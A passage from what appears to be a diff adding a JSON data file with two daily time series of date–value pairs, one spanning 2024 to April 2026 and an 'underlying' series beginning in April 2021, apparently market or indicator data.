53.810621817261044 + ], + [ + "2024-03-20", + 58.34234415658998 + ], + [ + "2024-03-21", + 60.04716266020657 + ], + [ + "2024-03-22", + 60.47030514806476 + ], + [ + "2024-03-25", + 58.356235408486945 + ], + [ + "2024-03-26", + 56.46649039639415 + ], + [ + "2024-03-27", + 58.00222243578616 + ], + [ + "2024-03-28", + 56.829882287312834 + ], + [ + "2024-04-01", + 57.88097888454973 + ], + [ + "2024-04-02", + 52.280983876747314 + ], + [ + "2024-04-03", + 53.52930985177631 + ], + [ + "2024-04-04", + 44.89350514860254 + ], + [ + "2024-04-05", + 51.31264559878181 + ], + [ + "2024-04-08", + 51.46702068299802 + ], + [ + "2024-04-09", + 53.45852963814625 + ], + [ + "2024-04-10", + 48.39416560291953 + ], + [ + "2024-04-11", + 56.45120598570859 + ], + [ + "2024-04-12", + 48.22674593115369 + ], + [ + "2024-04-15", + 41.598814665467934 + ], + [ + "2024-04-16", + 41.64671108768089 + ], + [ + "2024-04-17", + 37.311612951938855 + ], + [ + "2024-04-18", + 35.47447486340356 + ], + [ + "2024-04-19", + 29.781723166709185 + ], + [ + "2024-04-22", + 35.11923398249597 + ], + [ + "2024-04-23", + 42.209742185576054 + ], + [ + "2024-04-24", + 43.73543832986322 + ], + [ + "2024-04-25", + 42.02616617015561 + ], + [ + "2024-04-26", + 48.86880825040764 + ], + [ + "2024-04-29", + 50.54822467064197 + ], + [ + "2024-04-30", + 43.39150341514885 + ], + [ + "2024-05-01", + 41.037420698538824 + ], + [ + "2024-05-02", + 46.51370546324031 + ], + [ + "2024-05-03", + 53.87184981103807 + ], + [ + "2024-05-06", + 57.38202856246087 + ], + [ + "2024-05-07", + 57.43326920679567 + ], + [ + "2024-05-08", + 57.158609130314076 + ], + [ + "2024-05-09", + 57.958000184864815 + ], + [ + "2024-05-10", + 58.85369582477899 + ], + [ + "2024-05-13", + 59.759242673126394 + ], + [ + "2024-05-14", + 62.258510903458436 + ], + [ + "2024-05-15", + 67.56430916510303 + ], + [ + "2024-05-16", + 66.24060024172682 + ], + [ + "2024-05-17", + 65.90800482234002 + ], + [ + "2024-05-20", + 68.35742302382624 + ], + [ + "2024-05-21", + 69.0343170324655 + ], + [ + "2024-05-22", + 68.873916699484 + ], + [ + "2024-05-23", + 65.1587974147221 + ], + [ + "2024-05-24", + 68.93513997720066 + ], + [ + "2024-05-28", + 70.33163983680222 + ], + [ + "2024-05-29", + 64.48488032252993 + ], + [ + "2024-05-30", + 56.8088563485818 + ], + [ + "2024-05-31", + 55.58489010271461 + ], + [ + "2024-06-03", + 58.3679616795728 + ], + [ + "2024-06-04", + 59.75934149183945 + ], + [ + "2024-06-05", + 68.21115743699896 + ], + [ + "2024-06-06", + 67.94277120589962 + ], + [ + "2024-06-07", + 67.21278008849106 + ], + [ + "2024-06-10", + 68.85620489801134 + ], + [ + "2024-06-11", + 71.48221710327692 + ], + [ + "2024-06-12", + 75.7191011560705 + ], + [ + "2024-06-13", + 77.24545814999013 + ], + [ + "2024-06-14", + 78.63551758319298 + ], + [ + "2024-06-17", + 81.52415169520043 + ], + [ + "2024-06-18", + 81.59265905678411 + ], + [ + "2024-06-20", + 74.20627690956897 + ], + [ + "2024-06-21", + 71.79212143564818 + ], + [ + "2024-06-24", + 62.51107106190212 + ], + [ + "2024-06-25", + 67.06445896442722 + ], + [ + "2024-06-26", + 67.83301554530587 + ], + [ + "2024-06-27", + 68.81456175055634 + ], + [ + "2024-06-28", + 64.53861425622358 + ], + [ + "2024-07-01", + 67.0192853435289 + ], + [ + "2024-07-02", + 70.95884736126618 + ], + [ + "2024-07-03", + 73.67592838286991 + ], + [ + "2024-07-05", + 76.6436550811854 + ], + [ + "2024-07-08", + 77.27937192933372 + ], + [ + "2024-07-09", + 77.51951997507743 + ], + [ + "2024-07-10", + 80.23483199378256 + ], + [ + "2024-07-11", + 62.8581031872991 + ], + [ + "2024-07-12", + 64.99712459737891 + ], + [ + "2024-07-15", + 65.96843753071717 + ], + [ + "2024-07-16", + 66.11310932678742 + ], + [ + "2024-07-17", + 48.933792416664204 + ], + [ + "2024-07-18", + 46.880830372713994 + ], + [ + "2024-07-19", + 43.23933390028174 + ], + [ + "2024-07-22", + 50.18173265624357 + ], + [ + "2024-07-23", + 48.6432364121927 + ], + [ + "2024-07-24", + 36.44185226950088 + ], + [ + "2024-07-25", + 33.74033735716081 + ], + [ + "2024-07-26", + 38.27296576686431 + ], + [ + "2024-07-29", + 39.159758112412526 + ], + [ + "2024-07-30", + 35.40735334426478 + ], + [ + "2024-07-31", + 47.02692294420571 + ], + [ + "2024-08-01", + 40.42712489421891 + ], + [ + "2024-08-02", + 35.32252475075313 + ], + [ + "2024-08-05", + 30.27390918171018 + ], + [ + "2024-08-06", + 33.45834123847898 + ], + [ + "2024-08-07", + 31.675699039343357 + ], + [ + "2024-08-08", + 41.11603364319639 + ], + [ + "2024-08-09", + 42.61828371249015 + ], + [ + "2024-08-12", + 43.264421231036735 + ], + [ + "2024-08-13", + 50.23282565669911 + ], + [ + "2024-08-14", + 50.32087591347701 + ], + [ + "2024-08-15", + 56.74108300316934 + ], + [ + "2024-08-16", + 57.05296740934669 + ], + [ + "2024-08-19", + 60.21316743259839 + ], + [ + "2024-08-20", + 59.45063909517159 + ], + [ + "2024-08-21", + 60.64111067437756 + ], + [ + "2024-08-22", + 54.73137807212243 + ], + [ + "2024-08-23", + 57.71870324595425 + ], + [ + "2024-08-26", + 54.23130273374791 + ], + [ + "2024-08-27", + 55.1211566546783 + ], + [ + "2024-08-28", + 51.04897970681378 + ], + [ + "2024-08-29", + 50.53620332371619 + ], + [ + "2024-08-30", + 54.53502129736665 + ], + [ + "2024-09-03", + 44.53997824859216 + ], + [ + "2024-09-04", + 43.82214965021133 + ], + [ + "2024-09-05", + 44.16940390687247 + ], + [ + "2024-09-06", + 37.08075582171197 + ], + [ + "2024-09-09", + 41.78177015064747 + ], + [ + "2024-09-10", + 45.00289766919795 + ], + [ + "2024-09-11", + 51.8118964683154 + ], + [ + "2024-09-12", + 54.60715352025589 + ], + [ + "2024-09-13", + 55.877397353192144 + ], + [ + "2024-09-16", + 54.2576880648526 + ], + [ + "2024-09-17", + 54.427052546338736 + ], + [ + "2024-09-18", + 52.70382129849365 + ], + [ + "2024-09-19", + 60.52919956996867 + ], + [ + "2024-09-20", + 59.708085277288504 + ], + [ + "2024-09-23", + 60.51003755901595 + ], + [ + "2024-09-24", + 61.99626668078433 + ], + [ + "2024-09-25", + 62.29144102167434 + ], + [ + "2024-09-26", + 64.68724359091493 + ], + [ + "2024-09-27", + 61.548977605411274 + ], + [ + "2024-09-30", + 62.49977533380813 + ], + [ + "2024-10-01", + 54.95998977602352 + ], + [ + "2024-10-02", + 55.537674379256295 + ], + [ + "2024-10-03", + 55.134507034306665 + ], + [ + "2024-10-04", + 60.099164131383255 + ], + [ + "2024-10-07", + 54.21364183847244 + ], + [ + "2024-10-08", + 60.02820655320904 + ], + [ + "2024-10-09", + 62.75215853319854 + ], + [ + "2024-10-10", + 62.08941444472769 + ], + [ + "2024-10-11", + 62.673151448014686 + ], + [ + "2024-10-14", + 65.728903627065 + ], + [ + "2024-10-15", + 57.57552854039728 + ], + [ + "2024-10-16", + 57.626612976091366 + ], + [ + "2024-10-17", + 57.935638283561914 + ], + [ + "2024-10-18", + 60.84783512711624 + ], + [ + "2024-10-21", + 61.69053166616188 + ], + [ + "2024-10-22", + 62.18868658881581 + ], + [ + "2024-10-23", + 51.949444445335146 + ], + [ + "2024-10-24", + 56.01339399659365 + ], + [ + "2024-10-25", + 58.85256163264147 + ], + [ + "2024-10-28", + 58.928730985867595 + ], + [ + "2024-10-29", + 63.28190482999287 + ], + [ + "2024-10-30", + 58.02257548130236 + ], + [ + "2024-10-31", + 44.7467077848002 + ], + [ + "2024-11-01", + 48.380750078307294 + ], + [ + "2024-11-04", + 47.058678324367335 + ], + [ + "2024-11-05", + 53.086692683600056 + ], + [ + "2024-11-06", + 62.89758154870317 + ], + [ + "2024-11-07", + 67.28420812423639 + ], + [ + "2024-11-08", + 67.59525125108496 + ], + [ + "2024-11-11", + 67.25103783584606 + ], + [ + "2024-11-12", + 66.12671885288276 + ], + [ + "2024-11-13", + 65.29254347137179 + ], + [ + "2024-11-14", + 60.834541494610185 + ], + [ + "2024-11-15", + 48.65471336772212 + ], + [ + "2024-11-18", + 51.62379130981246 + ], + [ + "2024-11-19", + 54.45204377159859 + ], + [ + "2024-11-20", + 54.16454261891763 + ], + [ + "2024-11-21", + 55.73536628092468 + ], + [ + "2024-11-22", + 56.45460502972148 + ], + [ + "2024-11-25", + 57.194338580129134 + ], + [ + "2024-11-26", + 59.70109709657369 + ], + [ + "2024-11-27", + 54.62253853251777 + ], + [ + "2024-11-29", + 58.80145536954117 + ], + [ + "2024-12-02", + 63.345527365578526 + ], + [ + "2024-12-03", + 64.54450371048884 + ], + [ + "2024-12-04", + 68.96575789655657 + ], + [ + "2024-12-05", + 66.92627045265593 + ], + [ + "2024-12-06", + 70.00292722210051 + ], + [ + "2024-12-09", + 64.34366445152932 + ], + [ + "2024-12-10", + 62.0003015787134 + ], + [ + "2024-12-11", + 68.47456997448616 + ], + [ + "2024-12-12", + 64.15514545563889 + ], + [ + "2024-12-13", + 66.81192512719973 + ], + [ + "2024-12-16", + 71.17390605059997 + ], + [ + "2024-12-17", + 68.18019188086113 + ], + [ + "2024-12-18", + 49.78671359673846 + ], + [ + "2024-12-19", + 48.123169292956156 + ], + [ + "2024-12-20", + 51.52814202228196 + ], + [ + "2024-12-23", + 55.100041194924536 + ], + [ + "2024-12-24", + 59.60508707231995 + ], + [ + "2024-12-26", + 59.279743887574355 + ], + [ + "2024-12-27", + 53.169847586512056 + ], + [ + "2024-12-30", + 47.91891800564437 + ], + [ + "2024-12-31", + 44.90891394915822 + ], + [ + "2025-01-02", + 44.22587164922776 + ], + [ + "2025-01-03", + 50.936371818001476 + ], + [ + "2025-01-06", + 55.08977208330589 + ], + [ + "2025-01-07", + 48.1901639677677 + ], + [ + "2025-01-08", + 48.257279188423254 + ], + [ + "2025-01-10", + 42.886772312642144 + ], + [ + "2025-01-13", + 41.874333067459524 + ], + [ + "2025-01-14", + 41.563161676111136 + ], + [ + "2025-01-15", + 51.04676280388894 + ], + [ + "2025-01-16", + 48.41092745961914 + ], + [ + "2025-01-17", + 54.46790241254073 + ], + [ + "2025-01-21", + 56.41519057838469 + ], + [ + "2025-01-22", + 60.41318080273645 + ], + [ + "2025-01-23", + 61.06095841245751 + ], + [ + "2025-01-24", + 58.32320231357707 + ], + [ + "2025-01-27", + 46.757218249083486 + ], + [ + "2025-01-28", + 51.827711797923094 + ], + [ + "2025-01-29", + 51.15125242675296 + ], + [ + "2025-01-30", + 52.65862499147549 + ], + [ + "2025-01-31", + 52.066284697369085 + ], + [ + "2025-02-03", + 48.81385304818378 + ], + [ + "2025-02-04", + 53.56665887521179 + ], + [ + "2025-02-05", + 55.24148510647922 + ], + [ + "2025-02-06", + 57.1640474666054 + ], + [ + "2025-02-07", + 51.389520018108996 + ], + [ + "2025-02-10", + 55.93234842155773 + ], + [ + "2025-02-11", + 54.83389440311268 + ], + [ + "2025-02-12", + 55.067752183145984 + ], + [ + "2025-02-13", + 60.47046368292 + ], + [ + "2025-02-14", + 61.929939714973344 + ], + [ + "2025-02-18", + 62.733359498220196 + ], + [ + "2025-02-19", + 62.83728671076759 + ], + [ + "2025-02-20", + 60.084399673590625 + ], + [ + "2025-02-21", + 48.8609359491776 + ], + [ + "2025-02-24", + 43.937963660135 + ], + [ + "2025-02-25", + 39.42599794558758 + ], + [ + "2025-02-26", + 40.668158251931494 + ], + [ + "2025-02-27", + 32.41779563573995 + ], + [ + "2025-02-28", + 39.70086317452027 + ], + [ + "2025-03-03", + 34.12605339930474 + ], + [ + "2025-03-04", + 33.443855415659755 + ], + [ + "2025-03-05", + 39.09107804828991 + ], + [ + "2025-03-06", + 32.70289900300649 + ], + [ + "2025-03-07", + 35.64698941252861 + ], + [ + "2025-03-10", + 28.514543017957138 + ], + [ + "2025-03-11", + 28.154874540124652 + ], + [ + "2025-03-12", + 32.47341056753373 + ], + [ + "2025-03-13", + 29.403663529019042 + ], + [ + "2025-03-14", + 37.76289605456151 + ], + [ + "2025-03-17", + 39.869440199572004 + ], + [ + "2025-03-18", + 36.36195304003508 + ], + [ + "2025-03-19", + 40.697002197015884 + ], + [ + "2025-03-20", + 39.94480272469873 + ], + [ + "2025-03-21", + 41.081561016211545 + ], + [ + "2025-03-24", + 48.14146395923028 + ], + [ + "2025-03-25", + 49.86093216059807 + ], + [ + "2025-03-26", + 44.6865159081875 + ], + [ + "2025-03-27", + 43.21836369649193 + ], + [ + "2025-03-28", + 37.175396239743286 + ], + [ + "2025-03-31", + 37.166585184888795 + ], + [ + "2025-04-01", + 40.063340619468484 + ], + [ + "2025-04-02", + 42.66156324105379 + ], + [ + "2025-04-03", + 31.720438265441828 + ], + [ + "2025-04-04", + 24.33893440291375 + ], + [ + "2025-04-07", + 25.023645532120696 + ], + [ + "2025-04-08", + 23.32329133153503 + ], + [ + "2025-04-09", + 48.154888007397226 + ], + [ + "2025-04-10", + 42.299956354815194 + ], + [ + "2025-04-11", + 45.27192463434173 + ], + [ + "2025-04-14", + 46.38623423307305 + ], + [ + "2025-04-15", + 46.580188222227605 + ], + [ + "2025-04-16", + 42.13512117422315 + ], + [ + "2025-04-17", + 42.11004990905149 + ], + [ + "2025-04-21", + 38.70329000224228 + ], + [ + "2025-04-22", + 43.77155644800944 + ], + [ + "2025-04-23", + 47.88554250431302 + ], + [ + "2025-04-24", + 52.62227258710621 + ], + [ + "2025-04-25", + 54.43888846577506 + ], + [ + "2025-04-28", + 54.37426539966888 + ], + [ + "2025-04-29", + 55.55640258530198 + ], + [ + "2025-04-30", + 55.52661685745107 + ], + [ + "2025-05-01", + 58.035138827057736 + ], + [ + "2025-05-02", + 60.778270262895596 + ], + [ + "2025-05-05", + 59.09109083444396 + ], + [ + "2025-05-06", + 56.46035940984963 + ], + [ + "2025-05-07", + 57.316058985383926 + ], + [ + "2025-05-08", + 59.5750968243549 + ], + [ + "2025-05-09", + 59.3581067922629 + ], + [ + "2025-05-12", + 67.32029069523355 + ], + [ + "2025-05-13", + 69.80093457498899 + ], + [ + "2025-05-14", + 70.75530472216816 + ], + [ + "2025-05-15", + 70.93774740639999 + ], + [ + "2025-05-16", + 71.69191500093866 + ], + [ + "2025-05-19", + 71.86584402579766 + ], + [ + "2025-05-20", + 70.2481673417969 + ], + [ + "2025-05-21", + 63.8198260647593 + ], + [ + "2025-05-22", + 64.28716736649812 + ], + [ + "2025-05-23", + 60.13938178599054 + ], + [ + "2025-05-27", + 66.07240995476144 + ], + [ + "2025-05-28", + 64.09140669211936 + ], + [ + "2025-05-29", + 64.59617821590928 + ], + [ + "2025-05-30", + 63.81953473290632 + ], + [ + "2025-06-02", + 66.01945243958437 + ], + [ + "2025-06-03", + 68.10301430309482 + ], + [ + "2025-06-04", + 68.84246280850812 + ], + [ + "2025-06-05", + 64.4836141854839 + ], + [ + "2025-06-06", + 67.35292921536296 + ], + [ + "2025-06-09", + 67.77919292078528 + ], + [ + "2025-06-10", + 69.69642993158905 + ], + [ + "2025-06-11", + 67.47882819286478 + ], + [ + "2025-06-12", + 68.234738280198 + ], + [ + "2025-06-13", + 60.16338403884248 + ], + [ + "2025-06-16", + 65.03616663022382 + ], + [ + "2025-06-17", + 59.46814393352815 + ], + [ + "2025-06-18", + 59.37354496581538 + ], + [ + "2025-06-20", + 57.029712775322636 + ], + [ + "2025-06-23", + 61.169819197921726 + ], + [ + "2025-06-24", + 66.40690577309245 + ], + [ + "2025-06-25", + 67.21515006675564 + ], + [ + "2025-06-26", + 70.0598159372311 + ], + [ + "2025-06-27", + 71.05922726441108 + ], + [ + "2025-06-30", + 72.90805899002235 + ], + [ + "2025-07-01", + 66.88105763251103 + ], + [ + "2025-07-02", + 69.13260107729752 + ], + [ + "2025-07-03", + 72.04420152915165 + ], + [ + "2025-07-07", + 66.79866384543462 + ], + [ + "2025-07-08", + 66.9901590736776 + ], + [ + "2025-07-09", + 69.38847067013461 + ], + [ + "2025-07-10", + 68.2951126675571 + ], + [ + "2025-07-11", + 66.5311468760481 + ], + [ + "2025-07-14", + 67.96408204207204 + ], + [ + "2025-07-15", + 68.33443689256126 + ], + [ + "2025-07-16", + 68.76908724064816 + ], + [ + "2025-07-17", + 72.03950051731327 + ], + [ + "2025-07-18", + 71.07980818964255 + ], + [ + "2025-07-21", + 73.15535878016804 + ], + [ + "2025-07-22", + 67.89019790030295 + ], + [ + "2025-07-23", + 69.93333074307763 + ], + [ + "2025-07-24", + 70.8689854503811 + ], + [ + "2025-07-25", + 71.93500457689284 + ], + [ + "2025-07-28", + 73.30423369139866 + ], + [ + "2025-07-29", + 71.4382434880689 + ], + [ + "2025-07-30", + 72.09879890149904 + ], + [ + "2025-07-31", + 65.62493905676178 + ], + [ + "2025-08-01", + 48.34061686259984 + ], + [ + "2025-08-04", + 59.015126086939034 + ], + [ + "2025-08-05", + 54.472497614045125 + ], + [ + "2025-08-06", + 60.49979583493349 + ], + [ + "2025-08-07", + 61.97614414604969 + ], + [ + "2025-08-08", + 65.78504791515746 + ], + [ + "2025-08-11", + 63.588888466973785 + ], + [ + "2025-08-12", + 68.4003622442131 + ], + [ + "2025-08-13", + 68.58050236075579 + ], + [ + "2025-08-14", + 67.93364190687129 + ], + [ + "2025-08-15", + 64.23535368893981 + ], + [ + "2025-08-18", + 63.89742183069462 + ], + [ + "2025-08-19", + 53.56738568909339 + ], + [ + "2025-08-20", + 49.823003341404714 + ], + [ + "2025-08-21", + 47.076030798940444 + ], + [ + "2025-08-22", + 55.78381837135376 + ], + [ + "2025-08-25", + 53.96815179414623 + ], + [ + "2025-08-26", + 56.103632694665215 + ], + [ + "2025-08-27", + 56.93059814920235 + ], + [ + "2025-08-28", + 60.22252269121915 + ], + [ + "2025-08-29", + 52.22382647385613 + ], + [ + "2025-09-02", + 47.37498506205308 + ], + [ + "2025-09-03", + 51.85647060309463 + ], + [ + "2025-09-04", + 56.484115567408814 + ], + [ + "2025-09-05", + 57.196798869670886 + ], + [ + "2025-09-08", + 59.60873074518341 + ], + [ + "2025-09-09", + 60.99035758664669 + ], + [ + "2025-09-10", + 61.15610542894127 + ], + [ + "2025-09-11", + 64.08032486268121 + ], + [ + "2025-09-12", + 66.17364133250962 + ], + [ + "2025-09-15", + 69.8548866651253 + ], + [ + "2025-09-16", + 69.04893793289584 + ], + [ + "2025-09-17", + 67.08169789564371 + ], + [ + "2025-09-18", + 71.0818700094328 + ], + [ + "2025-09-19", + 73.6899989470409 + ], + [ + "2025-09-22", + 75.7626894001163 + ], + [ + "2025-09-23", + 69.14206575938451 + ], + [ + "2025-09-24", + 65.88677893162674 + ], + [ + "2025-09-25", + 62.037409666267145 + ], + [ + "2025-09-26", + 64.17727040677522 + ], + [ + "2025-09-29", + 66.47905903310468 + ], + [ + "2025-09-30", + 67.80294363793247 + ], + [ + "2025-10-01", + 70.0405481891695 + ], + [ + "2025-10-02", + 71.85451138008827 + ], + [ + "2025-10-03", + 67.33980411415351 + ], + [ + "2025-10-06", + 70.84445532659605 + ], + [ + "2025-10-07", + 65.49771299886935 + ], + [ + "2025-10-08", + 70.66177507449021 + ], + [ + "2025-10-09", + 69.46607768522296 + ], + [ + "2025-10-10", + 45.640220599649545 + ], + [ + "2025-10-13", + 55.36825477851986 + ], + [ + "2025-10-14", + 52.14681650028183 + ], + [ + "2025-10-15", + 55.10697475362638 + ], + [ + "2025-10-16", + 53.23300974579039 + ], + [ + "2025-10-17", + 56.07516187030509 + ], + [ + "2025-10-20", + 61.00451478170778 + ], + [ + "2025-10-21", + 60.85000010530663 + ], + [ + "2025-10-22", + 55.29398700163002 + ], + [ + "2025-10-23", + 58.795340414940966 + ], + [ + "2025-10-24", + 62.812963687038796 + ], + [ + "2025-10-27", + 68.40513124995707 + ], + [ + "2025-10-28", + 70.5044338825302 + ], + [ + "2025-10-29", + 71.69936517506414 + ], + [ + "2025-10-30", + 62.41263247122477 + ], + [ + "2025-10-31", + 63.9739442664813 + ], + [ + "2025-11-03", + 65.51160275998808 + ], + [ + "2025-11-04", + 54.779032096089715 + ], + [ + "2025-11-05", + 57.15351358860319 + ], + [ + "2025-11-06", + 49.147112368831515 + ], + [ + "2025-11-07", + 47.944715459798026 + ], + [ + "2025-11-10", + 56.04016526444903 + ], + [ + "2025-11-11", + 54.90856548471626 + ], + [ + "2025-11-12", + 54.55834174608961 + ], + [ + "2025-11-13", + 46.32440348905366 + ], + [ + "2025-11-14", + 46.63901013002466 + ], + [ + "2025-11-17", + 43.532575439685 + ], + [ + "2025-11-18", + 39.52523548044856 + ], + [ + "2025-11-19", + 42.29598905098326 + ], + [ + "2025-11-20", + 35.34064285672922 + ], + [ + "2025-11-21", + 38.70419359861804 + ], + [ + "2025-11-24", + 48.582814747836075 + ], + [ + "2025-11-25", + 50.69794435980614 + ], + [ + "2025-11-26", + 53.6590395878372 + ], + [ + "2025-11-28", + 56.27680502330042 + ], + [ + "2025-12-01", + 54.88227579712147 + ], + [ + "2025-12-02", + 57.51493004028151 + ], + [ + "2025-12-03", + 58.338817475956944 + ], + [ + "2025-12-04", + 57.87758479295596 + ], + [ + "2025-12-05", + 59.3916420919982 + ], + [ + "2025-12-08", + 58.325035979843804 + ], + [ + "2025-12-09", + 58.83588063078125 + ], + [ + "2025-12-10", + 60.56660697788882 + ], + [ + "2025-12-11", + 58.467397826907025 + ], + [ + "2025-12-12", + 47.92745529565921 + ], + [ + "2025-12-15", + 45.64537235104613 + ], + [ + "2025-12-16", + 46.718696827152925 + ], + [ + "2025-12-17", + 38.95490637555612 + ], + [ + "2025-12-18", + 46.324631351955176 + ], + [ + "2025-12-19", + 52.0178779131538 + ], + [ + "2025-12-22", + 53.97631190790889 + ], + [ + "2025-12-23", + 55.88012135174942 + ], + [ + "2025-12-24", + 57.08010567332411 + ], + [ + "2025-12-26", + 57.04335896202142 + ], + [ + "2025-12-29", + 54.2079453772734 + ], + [ + "2025-12-30", + 52.858717616458826 + ], + [ + "2025-12-31", + 48.25952701516102 + ], + [ + "2026-01-02", + 47.230927888146915 + ], + [ + "2026-01-05", + 51.76222803214646 + ], + [ + "2026-01-06", + 56.271122811755326 + ], + [ + "2026-01-07", + 56.75221310727431 + ], + [ + "2026-01-08", + 53.03476275870342 + ], + [ + "2026-01-09", + 58.17135225578615 + ], + [ + "2026-01-12", + 58.581830007564704 + ], + [ + "2026-01-13", + 57.49512772120071 + ], + [ + "2026-01-14", + 50.27091354611099 + ], + [ + "2026-01-15", + 52.4171680471203 + ], + [ + "2026-01-16", + 51.85516304112819 + ], + [ + "2026-01-20", + 40.10133484160906 + ], + [ + "2026-01-21", + 48.00503530156068 + ], + [ + "2026-01-22", + 51.74243783270874 + ], + [ + "2026-01-23", + 53.323208746956006 + ], + [ + "2026-01-26", + 55.516941398698286 + ], + [ + "2026-01-27", + 59.734208759740895 + ], + [ + "2026-01-28", + 61.194610244302446 + ], + [ + "2026-01-29", + 57.14688852077282 + ], + [ + "2026-01-30", + 50.03708383935626 + ], + [ + "2026-02-02", + 53.55208059574001 + ], + [ + "2026-02-03", + 45.744040208483256 + ], + [ + "2026-02-04", + 38.905013258894144 + ], + [ + "2026-02-05", + 34.41824702901903 + ], + [ + "2026-02-06", + 44.4102079806966 + ], + [ + "2026-02-09", + 47.59225972274992 + ], + [ + "2026-02-10", + 45.8667165392504 + ], + [ + "2026-02-11", + 47.056273347541286 + ], + [ + "2026-02-12", + 39.88024336729888 + ], + [ + "2026-02-13", + 40.8769105419868 + ], + [ + "2026-02-17", + 40.52642475605996 + ], + [ + "2026-02-18", + 44.25393020306629 + ], + [ + "2026-02-19", + 42.76257386728545 + ], + [ + "2026-02-20", + 47.17530760181783 + ], + [ + "2026-02-23", + 42.307625273253244 + ], + [ + "2026-02-24", + 47.40917079070809 + ], + [ + "2026-02-25", + 53.454077537091266 + ], + [ + "2026-02-26", + 48.39510923682298 + ], + [ + "2026-02-27", + 47.13593134660463 + ], + [ + "2026-03-02", + 47.73672665691216 + ], + [ + "2026-03-03", + 43.413082210107945 + ], + [ + "2026-03-04", + 50.24868516214233 + ], + [ + "2026-03-05", + 48.97034164339593 + ], + [ + "2026-03-06", + 43.09312555274008 + ], + [ + "2026-03-09", + 48.871742995435106 + ], + [ + "2026-03-10", + 48.87873791454798 + ], + [ + "2026-03-11", + 48.821324714953775 + ], + [ + "2026-03-12", + 41.909312066309624 + ], + [ + "2026-03-13", + 39.84724946493397 + ], + [ + "2026-03-16", + 45.300153686334816 + ], + [ + "2026-03-17", + 47.552714860080286 + ], + [ + "2026-03-18", + 42.183177008343606 + ], + [ + "2026-03-19", + 41.06679178481037 + ], + [ + "2026-03-20", + 35.21569399496299 + ], + [ + "2026-03-23", + 40.757175754313174 + ], + [ + "2026-03-24", + 38.61431524927745 + ], + [ + "2026-03-25", + 41.76403474392534 + ], + [ + "2026-03-26", + 34.74864709553303 + ], + [ + "2026-03-27", + 30.360436679871583 + ], + [ + "2026-03-30", + 28.855145164236404 + ], + [ + "2026-03-31", + 42.37827654040538 + ], + [ + "2026-04-01", + 46.50901689467074 + ], + [ + "2026-04-02", + 46.894266010190094 + ], + [ + "2026-04-06", + 48.9735897804959 + ], + [ + "2026-04-07", + 49.028558966470904 + ], + [ + "2026-04-08", + 58.408137238792904 + ], + [ + "2026-04-09", + 60.2535058654175 + ], + [ + "2026-04-10", + 60.65699402505437 + ], + [ + "2026-04-13", + 63.52111101359946 + ], + [ + "2026-04-14", + 67.9744973326308 + ], + [ + "2026-04-15", + 70.97057374958263 + ], + [ + "2026-04-16", + 71.95622611074239 + ], + [ + "2026-04-17", + 74.50130605328323 + ], + [ + "2026-04-20", + 72.75337132221188 + ], + [ + "2026-04-21", + 70.62253154480013 + ], + [ + "2026-04-22", + 74.18999632009644 + ], + [ + "2026-04-23", + 71.01117667153218 + ] + ], + "underlying": [ + [ + "2021-04-01", + 22.899221420288086 + ], + [ + "2021-04-05", + 24.27460289001465 + ], + [ + "2021-04-06", + 24.217294692993164 + ], + [ + "2021-04-07", + 24.396381378173828 + ], + [ + "2021-04-08", + 25.158098220825195 + ], + [ + "2021-04-09", + 25.61417007446289 + ], + [ + "2021-04-12", + 25.51388168334961 + ], + [ + "2021-04-13", + 26.387826919555664 + ], + [ + "2021-04-14", + 25.461355209350586 + ], + [ + "2021-04-15", + 26.58601188659668 + ], + [ + "2021-04-16", + 26.6982421875 + ], + [ + "2021-04-19", + 25.96995735168457 + ], + [ + "2021-04-20", + 25.401655197143555 + ], + [ + "2021-04-21", + 26.04397964477539 + ], + [ + "2021-04-22", + 25.09601593017578 + ], + [ + "2021-04-23", + 26.04159164428711 + ], + [ + "2021-04-26", + 26.55735969543457 + ], + [ + "2021-04-27", + 26.208740234375 + ], + [ + "2021-04-28", + 25.938915252685547 + ], + [ + "2021-04-29", + 26.199188232421875 + ], + [ + "2021-04-30", + 25.707298278808594 + ], + [ + "2021-05-03", + 25.28704261779785 + ], + [ + "2021-05-04", + 23.954633712768555 + ], + [ + "2021-05-05", + 23.675254821777344 + ], + [ + "2021-05-06", + 24.193418502807617 + ], + [ + "2021-05-07", + 24.785598754882812 + ], + [ + "2021-05-10", + 22.923097610473633 + ], + [ + "2021-05-11", + 22.808475494384766 + ], + [ + "2021-05-12", + 21.072532653808594 + ], + [ + "2021-05-13", + 21.51666831970215 + ], + [ + "2021-05-14", + 22.915931701660156 + ], + [ + "2021-05-17", + 22.52910804748535 + ], + [ + "2021-05-18", + 22.056318283081055 + ], + [ + "2021-05-19", + 22.137502670288086 + ], + [ + "2021-05-20", + 23.417375564575195 + ], + [ + "2021-05-21", + 23.030548095703125 + ], + [ + "2021-05-24", + 24.183866500854492 + ], + [ + "2021-05-25", + 24.300867080688477 + ], + [ + "2021-05-26", + 24.54681396484375 + ], + [ + "2021-05-27", + 24.26027488708496 + ], + [ + "2021-05-28", + 24.496671676635742 + ], + [ + "2021-06-01", + 24.257888793945312 + ], + [ + "2021-06-02", + 24.38444709777832 + ], + [ + "2021-06-03", + 23.61795425415039 + ], + [ + "2021-06-04", + 24.828577041625977 + ], + [ + "2021-06-07", + 25.04825782775879 + ], + [ + "2021-06-08", + 25.0769100189209 + ], + [ + "2021-06-09", + 25.105566024780273 + ], + [ + "2021-06-10", + 25.87444496154785 + ], + [ + "2021-06-11", + 26.079795837402344 + ], + [ + "2021-06-14", + 26.810470581054688 + ], + [ + "2021-06-15", + 26.31380271911621 + ], + [ + "2021-06-16", + 26.032039642333984 + ], + [ + "2021-06-17", + 27.00388526916504 + ], + [ + "2021-06-18", + 26.359174728393555 + ], + [ + "2021-06-21", + 26.841514587402344 + ], + [ + "2021-06-22", + 27.591291427612305 + ], + [ + "2021-06-23", + 27.6390438079834 + ], + [ + "2021-06-24", + 28.147655487060547 + ], + [ + "2021-06-25", + 28.059303283691406 + ], + [ + "2021-06-28", + 29.052637100219727 + ], + [ + "2021-06-29", + 29.37976837158203 + ], + [ + "2021-06-30", + 29.250825881958008 + ], + [ + "2021-07-01", + 29.265153884887695 + ], + [ + "2021-07-02", + 30.258485794067383 + ], + [ + "2021-07-06", + 30.664413452148438 + ], + [ + "2021-07-07", + 30.86021614074707 + ], + [ + "2021-07-08", + 30.32534408569336 + ], + [ + "2021-07-09", + 30.83872413635254 + ], + [ + "2021-07-12", + 31.225555419921875 + ], + [ + "2021-07-13", + 31.208845138549805 + ], + [ + "2021-07-14", + 31.378379821777344 + ], + [ + "2021-07-15", + 30.7288875579834 + ], + [ + "2021-07-16", + 29.974334716796875 + ], + [ + 